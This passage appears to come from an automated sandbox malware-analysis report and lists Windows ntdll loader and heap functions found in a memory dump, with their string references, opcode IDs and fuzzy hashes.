                                                                                    • Opcode Fuzzy Hash: c5d4642e6b88d01a0187aa2cc91468202a07f1709e915a9b702acea590c555f8
                                                                                    • Instruction Fuzzy Hash: BC416471900209EFDF12DADCC881FEEBBBDAB14701F1441AAE609E7680D774DA44CB51
                                                                                    Function 018E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: 81f702b403c5f5e463829bc0350f12569e2d55fc242cf5ea7ec05b304d2e2a27
                                                                                    • Instruction ID: b9f8dce19498606cd19d5ee78a01f639532214d55a0ae60fd264324c3bc04473
                                                                                    • Opcode Fuzzy Hash: 81f702b403c5f5e463829bc0350f12569e2d55fc242cf5ea7ec05b304d2e2a27
                                                                                    • Instruction Fuzzy Hash: DA410471A00658CBEB25DBD8C848BADBBF8FF96344F140459DA09EB781D7359B01CB51
                                                                                    Function 018D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018D4888
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 018D4899
                                                                                    • LdrpCheckRedirection, xrefs: 018D488F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: 61058598d7baa675802aad18798ec610602b802dda7695ab30ea578bb6dc06b3
                                                                                    • Instruction ID: cc02fce4eee1aaf2c8e9f0e670cc230c9bcdfdc766f5c1915bf2aeefddceb404
                                                                                    • Opcode Fuzzy Hash: 61058598d7baa675802aad18798ec610602b802dda7695ab30ea578bb6dc06b3
                                                                                    • Instruction Fuzzy Hash: CC41D132A043559FCB21CE6DD841A26BBE5BF49B90F06066DED88E7B11D731DA00CB91
                                                                                    Function 01860BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-2558761708
                                                                                    • Opcode ID: 426b57c3289c1244ee3adbe59b739fe6f121aebe5d5816e89a4441a991852358
                                                                                    • Instruction ID: 588d0e73380e9d4df670e8ba17e24c26826752344f8b74f4e71d21b8d5afd350
                                                                                    • Opcode Fuzzy Hash: 426b57c3289c1244ee3adbe59b739fe6f121aebe5d5816e89a4441a991852358
                                                                                    • Instruction Fuzzy Hash: BD11DF7135510ADFDB2ADB28C4C1BB6B7A8EF41B19F188129F406CB391DB38DA81C755
                                                                                    Function 018D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 018D20F3
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018D2104
                                                                                    • LdrpInitializationFailure, xrefs: 018D20FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: 795e1de8955b587246c1bea0b5b1606fd46635d444a8e8492df5fcc32e130c4b
                                                                                    • Instruction ID: 39b4608f992118e0d38db1018976a4d5e70f9f06687a67dde5edaba7db71414e
                                                                                    • Opcode Fuzzy Hash: 795e1de8955b587246c1bea0b5b1606fd46635d444a8e8492df5fcc32e130c4b
                                                                                    • Instruction Fuzzy Hash: D5F04678640308BBEB20E66CDC42F993B69FB80B04F140058FB40F7381D6B0AB00C681
                                                                                    Function 018603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: 1bd8db06d95bddd9ac0c0c8f5e8a6b86800149bcbcb2448c68bfec6d32d9c885
                                                                                    • Instruction ID: 4e6d14cd85c932cdddf793fc447130f73b7975b1b2ec8f3793a2d6c54d1ca299
                                                                                    • Opcode Fuzzy Hash: 1bd8db06d95bddd9ac0c0c8f5e8a6b86800149bcbcb2448c68bfec6d32d9c885
                                                                                    • Instruction Fuzzy Hash: 50714A71A0014A9FDB11DFADC991BAEB7F8FF18744F144065E905EB252EA34EE01CBA1
                                                                                    Function 0185A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 0185AA25
                                                                                    • LdrResSearchResource Enter, xrefs: 0185AA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    • Opcode ID: d443138f76a504be14bfd559df83b00001cd0065bcdf7821a187d066f5e47cd5
                                                                                    • Instruction ID: cfdccf724e27351f3bec441ee705ff2ca56a09558d07aaf42b85169dc30dee2c
                                                                                    • Opcode Fuzzy Hash: d443138f76a504be14bfd559df83b00001cd0065bcdf7821a187d066f5e47cd5
                                                                                    • Instruction Fuzzy Hash: 01E18B71A00619ABEF668A9DC9C0BEEBBBAFF08314F144626ED01E7351D7349B41CB51
                                                                                    Function 0191A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: 472d8d77367e683fcdaecd4c419bf838aa0fdaece21f551d7117d10b7fdf94fe
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: 7BC1F43120538A9BE725CF28C840B2BBBE9AFC4754F044E2DF69AC7294D774D985CB41
                                                                                    Function 018CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 94dd3232a3450b7f4d57089eb4d8a32a302c34b18c54751f0452f6282dd6f1c0
                                                                                    • Instruction ID: 5bedaff8ca46b67f8b78f34b513b92b2dbaf43571a46935746b8af5d351dd461
                                                                                    • Opcode Fuzzy Hash: 94dd3232a3450b7f4d57089eb4d8a32a302c34b18c54751f0452f6282dd6f1c0
                                                                                    • Instruction Fuzzy Hash: 8E613D71E007199FDB15DFA8C940BAEBBB9FB48B04F14406DE659EB251D731EA40CB50
                                                                                    Function 018F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: 4dc16eb0f5bd0967429218c4907a7bbec785b7596e0534844879b7d0cb4b9815
                                                                                    • Instruction ID: c0452f487f1faec2afbd2c3d35baf8445c6d0b2aab3a528134bd54ec81fa7295
                                                                                    • Opcode Fuzzy Hash: 4dc16eb0f5bd0967429218c4907a7bbec785b7596e0534844879b7d0cb4b9815
                                                                                    • Instruction Fuzzy Hash: F5510971D0121DAEDF11DFA9CC84AEFBBBDEB58754F14052AEA11F7290E6309A05CB60
                                                                                    Function 018504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0185063D
                                                                                    • kLsE, xrefs: 01850540
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: 08f430932b3417e6fb41b61828108cf6be3a99d282e247a69a1adddd41d77e89
                                                                                    • Instruction ID: cceabc12dba7fa100cbe9054f36e72991ee8bb2c3889dc0bfa4af989212f5a22
                                                                                    • Opcode Fuzzy Hash: 08f430932b3417e6fb41b61828108cf6be3a99d282e247a69a1adddd41d77e89
                                                                                    • Instruction Fuzzy Hash: 7A51BDB1504B468FD765DF68C5406A7BBE4EF84304F10483EFAAAC7241E774D645CBA2
                                                                                    Function 0185A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0185A2FB
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0185A309
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: ffe22be809efc493659d93b8e52df08571f4900994a81716cd02a7b92786c837
                                                                                    • Instruction ID: f7403c51287b02ecd26c2584388f9675ae578aa5d2161b70d111e970c61a58e5
                                                                                    • Opcode Fuzzy Hash: ffe22be809efc493659d93b8e52df08571f4900994a81716cd02a7b92786c837
                                                                                    • Instruction Fuzzy Hash: 4B41CF31A00649DBDB19CF5DC880BA9BBB5FF85308F1441A5EE04DB352E675DB40CB51
                                                                                    Function 0188A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: e612e68e31344162f76037a8c98dca7b39cd9f5bc6c0f0aaba44e8771d9dfb17
                                                                                    • Instruction ID: 99e7c86bcfad19845dd73094bf4623a95c744a13c40c1a3bf6b57ebb4b3cd9b5
                                                                                    • Opcode Fuzzy Hash: e612e68e31344162f76037a8c98dca7b39cd9f5bc6c0f0aaba44e8771d9dfb17
                                                                                    • Instruction Fuzzy Hash: 7C01F4B2295704AFD321EF14CD45F2677E8E785B29F04893AE648C71D4E334EA04CB4A
                                                                                    Function 0185C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 711e4d9ca52d60622c75a81ca5aee2e30520fb470598ff5cab2eb1b5f863a333
                                                                                    • Instruction ID: f060b486eeb4c22b1fc53eaa727c2d4b637f25695e69cf16f9878586d1e3b712
                                                                                    • Opcode Fuzzy Hash: 711e4d9ca52d60622c75a81ca5aee2e30520fb470598ff5cab2eb1b5f863a333
                                                                                    • Instruction Fuzzy Hash: 22826875E002198BEBA5CFA9C880BEDBBB5FF48354F148169ED19EB251D7309A81CF50
                                                                                    Function 018D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: a0da85a188d46c64d16ba4c09233edd1e0648919f8e0b78efa66927a56ef2d70
                                                                                    • Instruction ID: 82268e679a7a2fbac2bd42c9757926295c2bb418f3f2fb718de70b9e33b499e3
                                                                                    • Opcode Fuzzy Hash: a0da85a188d46c64d16ba4c09233edd1e0648919f8e0b78efa66927a56ef2d70
                                                                                    • Instruction Fuzzy Hash: 56916371940219AFDB21DB99CD85FAEBBB8EF14B50F200065F600EB191E774EE00CB61
                                                                                    Function 0188A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: 90585f2d18ccdda4a8112ffc7eba70f74a3bd330fa2ddaff47077ac9cf11e3cd
                                                                                    • Instruction ID: ef92a4abb6859229d3f6816dd9f096194a98da7e832aba86c531471e428c945e
                                                                                    • Opcode Fuzzy Hash: 90585f2d18ccdda4a8112ffc7eba70f74a3bd330fa2ddaff47077ac9cf11e3cd
                                                                                    • Instruction Fuzzy Hash: 31714BB5E0020A9BDB28DF9CC590AAEBBB1BF48B14F24853EE505E7345E735DA41CB50
                                                                                    Function 018F4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    • Opcode ID: 925ab48bf75c4dabb9e03002d429d28b36a8c2699db3629b1445fcb24d374a73
                                                                                    • Instruction ID: beec6fb807586da1e3fa056466ada5a6fd411c639f69a9c7ebdda01c7ad93a18
                                                                                    • Opcode Fuzzy Hash: 925ab48bf75c4dabb9e03002d429d28b36a8c2699db3629b1445fcb24d374a73
                                                                                    • Instruction Fuzzy Hash: 57518E72D0022A9BDF11DF99D840AAFBBB4AF44B14F05412EEB12FB255D7349A05CBA4
                                                                                    Function 0186E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: 76009d15f3ffada3a3694e1d2ac38760dca7e6814add36678e66b32a9f88fc16
                                                                                    • Instruction ID: 6090355a069ce5237fce143edad4dc142115343d31ca83d89adb6c330919e8d0
                                                                                    • Opcode Fuzzy Hash: 76009d15f3ffada3a3694e1d2ac38760dca7e6814add36678e66b32a9f88fc16
                                                                                    • Instruction Fuzzy Hash: 6341A3765183129BD711DA79C880B6BBBECAF88714F04092DFA84D7140E778DB04C797
                                                                                    Function 0184CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    • Opcode ID: fbf819b604f6f8c3beb5edc2db53cabd0af23cef99cfd2fba508d2b4bc632e14
                                                                                    • Instruction ID: 45a87291b193af9849aeaa556d9516e9f6a132352f8b3f64050bf1924be6c6b3
                                                                                    • Opcode Fuzzy Hash: fbf819b604f6f8c3beb5edc2db53cabd0af23cef99cfd2fba508d2b4bc632e14
                                                                                    • Instruction Fuzzy Hash: 1041D172D01209ABEF29DB9CCC80AEEBBB8FF44310F54415AE512E3650D7709B81CB95
                                                                                    Function 018CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 0fb78614664126f9fea877db187d07b84a220838640b8f1e9fe4c0c3a0d50194
                                                                                    • Instruction ID: c4d8f032d0cf43eca45139b9f70b56000d6fa0a4bbf81a94647b451748003adc
                                                                                    • Opcode Fuzzy Hash: 0fb78614664126f9fea877db187d07b84a220838640b8f1e9fe4c0c3a0d50194
                                                                                    • Instruction Fuzzy Hash: A84141B2D0112DAADF21DA54CC84FDFB77CEB45714F0045A9EA08EB140DB309F898BA5
                                                                                    Function 018E6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: c36b4835ec94bd0536e4d42c71113a07c3d8266858d83a921939846cb74ce704
                                                                                    • Instruction ID: aa892c06ef0882f492d9fa7f63f4d5ef49af51f48879952106c1c94df8706e60
                                                                                    • Opcode Fuzzy Hash: c36b4835ec94bd0536e4d42c71113a07c3d8266858d83a921939846cb74ce704
                                                                                    • Instruction Fuzzy Hash: 1D312C31A007099BEB22CB6DC858BAE7BE8DF66704F244068E941DB282E775DA15CB50
                                                                                    Function 018CCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: b9f6fd8b17e7b9d29c0f47a0e391a2b64216faa407d647bebaeb332ad7bb838f
                                                                                    • Instruction ID: acfef3ee653b90e6a9305c56226f91fbd1b5e31d78f479255717b710d76d7060
                                                                                    • Opcode Fuzzy Hash: b9f6fd8b17e7b9d29c0f47a0e391a2b64216faa407d647bebaeb332ad7bb838f
                                                                                    • Instruction Fuzzy Hash: B4310376900519AFEB15DA9CC845E6FBBB4EB80B20F01416DE909E7251D730DF04EBE0
                                                                                    Function 018D892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018D895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: 2da186fe681b6a99a19699f6cd0ff444c8cc6fb947ca02ce8da98bdb0c294807
                                                                                    • Instruction ID: 9aaaebeabf763f14f3824066f82aedee17ca56b20587d7a17118847e90cae55b
                                                                                    • Opcode Fuzzy Hash: 2da186fe681b6a99a19699f6cd0ff444c8cc6fb947ca02ce8da98bdb0c294807
                                                                                    • Instruction Fuzzy Hash: B101F236200305BBEB306FAA8C84E5A7B65EF87364F05002DF68196556CF20AE41C793
                                                                                    Function 018F2000 Relevance: .8, Instructions: 757COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d85012e54692f34934e44b1f0444ab5a844de8f7a9d31503f33add29826ef10b
                                                                                    • Instruction ID: ac83dd329933a3c2401a3794040e9b34bf6c832630d92a6403cfc7bf335036b7
                                                                                    • Opcode Fuzzy Hash: d85012e54692f34934e44b1f0444ab5a844de8f7a9d31503f33add29826ef10b
                                                                                    • Instruction Fuzzy Hash: F842E1766083419BE725CF68C890A6BBBE6FF88304F48092DFB82D7250D770DA45CB52
                                                                                    Function 018E8158 Relevance: .6, Instructions: 617COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e1a2989f4585ff3dbd87c59d6eee85416888be613c1640759c7725d3d4cc313
                                                                                    • Instruction ID: 94702dc9572d31cdd7b10fd93d8132f13b4a6f8dd623aee203fe449eeee4fc70
                                                                                    • Opcode Fuzzy Hash: 4e1a2989f4585ff3dbd87c59d6eee85416888be613c1640759c7725d3d4cc313
                                                                                    • Instruction Fuzzy Hash: FE426D75E002198FEB25CF69C885BADBBF5BF4A304F148099E949EB242D7349A81CF50
                                                                                    Function 01862840 Relevance: .6, Instructions: 605COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 37e933afa7be48e1066a7dd62648958c2f8cb2c11ed3d54f15c0450b1bb13ce8
                                                                                    • Instruction ID: bfcdca315188c4aed7cb01c6cc9b00c519d70be7693d10d8fe3c83ef2facfba1
                                                                                    • Opcode Fuzzy Hash: 37e933afa7be48e1066a7dd62648958c2f8cb2c11ed3d54f15c0450b1bb13ce8
                                                                                    • Instruction Fuzzy Hash: 4332CE70A0075A8BEB25CF69C884BFEBBF2BF85704F244119D54ADB385E735AA41CB50
                                                                                    Function 018FA118 Relevance: .6, Instructions: 591COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9bc9ab26353f51ae105fa2db942ca0d54f94ae5e9175b99a427e34be219e4505
                                                                                    • Instruction ID: 96e99184b003452d2b44dd337f2a95a873efda07444c8a529607ee8908a65f77
                                                                                    • Opcode Fuzzy Hash: 9bc9ab26353f51ae105fa2db942ca0d54f94ae5e9175b99a427e34be219e4505
                                                                                    • Instruction Fuzzy Hash: 2B22C0742046658BEB29CF2DC094772BBF1AF44364F18845DEB8ACB286D335E652CB60
                                                                                    Function 01878DBF Relevance: .6, Instructions: 554COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8001b0db86c8fa77a86ff33c0993d96ef43c8da266d1f235bad446aae8a9a602
                                                                                    • Instruction ID: 9828e064bc394fafe0178c77ff89cb022a6125b30fcd21b2738b849ac60616f2
                                                                                    • Opcode Fuzzy Hash: 8001b0db86c8fa77a86ff33c0993d96ef43c8da266d1f235bad446aae8a9a602
                                                                                    • Instruction Fuzzy Hash: 33224C71E0021A9BCB15CF99C4C09FEBBF6BF49318B18815AE945DB242E734EA41DB60
                                                                                    Function 01856A50 Relevance: .5, Instructions: 548COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
